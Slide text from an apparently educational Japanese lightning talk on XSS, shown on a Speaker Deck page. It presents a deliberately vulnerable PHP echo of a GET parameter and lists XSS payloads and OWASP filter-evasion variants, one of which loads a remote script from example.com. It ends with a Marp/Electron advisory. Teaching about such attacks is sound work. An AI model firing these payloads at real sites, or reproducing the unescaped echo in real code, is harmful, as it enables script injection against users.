Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
XSSの入力値を調べてみた / searching xss insertion value
Search
Tomoyuki KOYAMA
February 03, 2018
Technology
3
1.4k
XSSの入力値を調べてみた / searching xss insertion value
2018/02/03 学生LT at freee
Tomoyuki KOYAMA
February 03, 2018
Tweet
Share
More Decks by Tomoyuki KOYAMA
See All by Tomoyuki KOYAMA
Reading HTTP Client Hints
tomoyk
0
63
Log message with JSON item count for root cause analysis in microservices
tomoyk
0
150
Distributed Log Search Based on Time Series Access and Service Relations
tomoyk
0
290
Webアプリを動かすまでのインフラ構築 / infra-build-for-web-app
tomoyk
0
380
コンピュータが大好きな私が大学院進学した理由 / Why I chose graduate school
tomoyk
2
840
この先生きのこるための学び方 / how-to-learn-tech
tomoyk
1
360
佐川急便のフィッシングサイトを調べてみた / Analysis of sagawa fishing site
tomoyk
1
160
既存のWebアプリをセキュアにするためにやったこと / Student-LT-WebSec
tomoyk
0
170
パケットを覗いてみよう / Packet workshop for beginners
tomoyk
0
300
Other Decks in Technology
See All in Technology
テクスチャ画像付きのメッシュモデルを3次元点群へ変換する
kentaitakura
1
420
Webブラウザのセキュリティ対策に役立つぞ!!~DevToolsの使い方~
masakiokuda
0
120
AI活用の壁を超える! 開発組織への普及の秘訣
kouryou
0
350
OCI IAM Identity Domains Entra IDとの認証連携設定手順 / Identity Domain Federation settings with Entra ID
oracle4engineer
PRO
2
1.4k
AI-Driven-Development-20250310
yuhattor
3
380
Oracle Cloud Infrastructure:2025年3月度サービス・アップデート
oracle4engineer
PRO
0
130
書籍『入門 OpenTelemetry』 / Intro of OpenTelemetry book
ymotongpoo
11
690
Codar: Arte ou Ciência?! A Jornada de um DEV na Creator Economy
vclementino
0
190
生成AIで生産性向上
tomuro
0
180
痒い所に手が届く!要約モデルのつくり方
sakusakumura
0
140
もうVPNは古い? VPNを使わずに オンプレサーバーを 管理する手法あれこれ
ebibibi
0
150
SLI/SLO・ラプソディあるいは組織への適用の旅
nwiizo
0
370
Featured
See All Featured
Thoughts on Productivity
jonyablonski
69
4.5k
Understanding Cognitive Biases in Performance Measurement
bluesmoon
27
1.6k
Practical Tips for Bootstrapping Information Extraction Pipelines
honnibal
PRO
14
1k
GraphQLとの向き合い方2022年版
quramy
44
14k
Creating an realtime collaboration tool: Agile Flush - .NET Oxford
marcduiker
28
2k
Building a Scalable Design System with Sketch
lauravandoore
462
33k
The Cult of Friendly URLs
andyhume
78
6.3k
Building Applications with DynamoDB
mza
93
6.3k
個人開発の失敗を避けるイケてる考え方 / tips for indie hackers
panda_program
101
18k
Put a Button on it: Removing Barriers to Going Fast.
kastner
60
3.7k
Fireside Chat
paigeccino
37
3.3k
A Modern Web Designer's Workflow
chriscoyier
693
190k
Transcript
XSS
B1 Twitter: @tmyk_kym : https://blog.koyama.me/ : Network/Web/Server/Security : PyCon JP,
Seccamp, etc
XSS (Cross Site Scripting) HTML CWE-79: Improper Neutralization of Input
During Web Page Generation ('Cross-site Scripting') (3.0)
... <!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1><?php echo $_GET['mode'];
?></h1> $_GET['mode'] hello <!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1>hello</h1>
... <!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1><?php echo $_GET['mode'];
?></h1> $_GET['mode'] <script>alert()</script> <!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1><script>alert()</script></h1>
XSS Stored XSS( ) Re ected XSS( ) DOM Based
XSS
XSS == XSS
<script>alert(1)</script> "><script>alert(1)</script> " onmouseover="alert(1) x" onerror="alert(1) <- img src javascript:alert(1)
<- a href
XSS
? / . XSS . XSS .
?
OWASP OWASP XSS 2015 XSS - OWASP https://jpcertcc.github.io/OWASPdocuments/CheatSheets/XSSFilterEvasion.html
( ) 3
[1] <SCRIPT/XSS SRC="http://example.com/xss.js"> </SCRIPT> / . ... <script xss="" src="http://example.com/xss.js">
</script>
[2] <<SCRIPT>alert("XSS");//<</SCRIPT> HTML XSS . ... "><script> alert("XSS");//< </script>
[3] <img src=x onerror=javas cript:ale rt('XSS')> &#x... HTML (16 )
. ... <img src="x" onerror="javascript:alert('XSS')">
( )
( ) <img src=javascript:alert('XSS')> <img src=javascript: alert(String.fromCharCode(88,83,83))> <META HTTP-EQUIV="refresh" CONTENT="3;
URL=http://;URL=http://yahoo.co.jp/;">
None
Electron Marp Electron Web ... <script>alert()</script> alert ...( )
?
JVN#21174546: Marp JavaScript https://jvn.jp/jp/JVN21174546/ However, sanitizing inline script should consider
on future. [Security issue] Remote script can read user local resource · Issue #187 · yhatt/marp “ “
XSS XSS alert() Electron